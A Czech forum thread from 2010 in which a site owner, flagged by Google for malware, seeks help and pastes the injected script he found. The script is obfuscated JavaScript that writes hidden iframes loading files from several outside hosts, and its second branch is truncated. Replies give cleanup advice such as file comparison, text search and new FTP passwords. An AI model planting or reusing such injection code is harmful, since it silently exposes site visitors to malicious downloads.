< návrat zpět

Diskuse


Téma: Malware na webu rss

Zaslal/a 19.1.2010 16:12

Dle googlu mám na stránkách nějaký záškodnický kód. Nemůžu ho teda najít. Nemáte nápad? Např. nějaký online scan by se šiknul. http://www.google.cz/interstitial?url=http://www.freemotivy.cz/

Zaslat odpověď >

#007337
Je to jednoduché, bych řekl.
1. Googlu se asi nebude líbit ten skrytý text pro vyhledávače, což Google asi bude jen penalizovat než blokovat.
2. Googlu se nelíbí ten javascript v patičce, který nejde načíst. Výměnný reklamní systém ti zřejmě zapříčinil blokaci.
#007338
Skytým textem to opravdu není, ten jsem doplnil do kódu dnes. Také je blbost aby se to Googlu nelíbilo 5 Problém přetrvává asi měsíc. A javascript v patičce tam je taky relativně nový a načíst jde. Před časem jsem prohlížel web a na pc byl Avast a ten viry našel i v javasciptu lightboxu. Ten jsem překopíroval. Ale chtělo by to nějaký scan...
#007339
Nevím, mě Firebug ukazuje, že javascript nejde načíst nebo je vadný.
#007340
Prohlížeče jej berou. Ale odstraním ho, už nám stejně jiného inzerenta.
Nějaké další nápady?
#007345
Tak jsem nakonec zkusil "Nástroje pro webmastery" od Google a v podrobnostech zjistil že se na stránkách objevoval tento script:
<script type="text/javascript" language="javascript"> var ld
anuhn="\x63\x61,co,da\x2cde,cy,\x65l,en\x2ceo,\x65s,f\x69,fr
\x2cga\x2cit\x2cja\x2cji\x2ckn\x2cn\x6c,\x6eo,\x70t,\x73v";
var vdxfas=navigator.language || navigator.systemLanguage; v
ar lang=vdxfas.toLowerCase( ); lang=lang.substr(0,2); if (ld
anuhn.indexOf(lang)==-1){nefskmy( ); }else {befii( ); }funct
ion befii( ){ document.write('<\x69frame fram\x65border=0 bo
rder=0 height=5 width\x3d\x30 sr\x63=\x22\x68t\x74p:/\x2f\x6
1xul13.c\x6fm\x2fadmin/g\x65tfile.\x70hp?\x61=\x31"></ifr\x6
1\x6de\x3e<\x69frame fra\x6debo\x72\x64er\x3d0 border=0 \x68
ei\x67ht=5\x20wi\x64th=0 src="http:\x2f/dogphotogr\x61phy\x2
enl/admin/ge\x74fi\x6ce\x2ephp\x3fa=1"></\x69frame\x3e<ifra\
x6de framebo\x72de\x72=\x30 \x62order=0 \x68ei\x67ht=5 wid\x
74h=0 s\x72c="h\x74tp://ar\x68ewi\x2ec\x6fm\x2epl/adm\x69n/g
etfil\x65.php\x3fa=1"></ifra\x6d\x65>');
; }function nefskmy( ){ var mGMCVF = "v0734a0734915r073 S07
3x07p0734915K0734915r0o0734n07349T0734915X073491 =0734 0734e
07349va073491l0734915"
Bohužel jej nikde nevidím a ve zdrojáku není.
#007352
ten kód může být součastí nějakého php souboru v sunlightu... mě se to jednu dobu stávalo, pomohlo změnit hesla na FTP....
čili zkus zkontrolovat velikosti originálních php souborů a těch na serveru,... pokud se liší, tak jsou "nakaženy"
#007355
Zkopirovat z ftp vsechny soubory a v commanderu dat hledat text v souborech napr 'nefskmy'. V nalezenych souborech skodlivy kod vymazat. Pak nahrat zpet na ftp.

Zmenit FTP hesla a pouzivat nejnovejsi verzi commandera.
#007361
Díky za nápady. O víkendu to asi probádám a přehraju .
#007500
Problém vyřešen. Chyba zřejmě na straně serveru hostující reklamní script. Google už varování odstranil.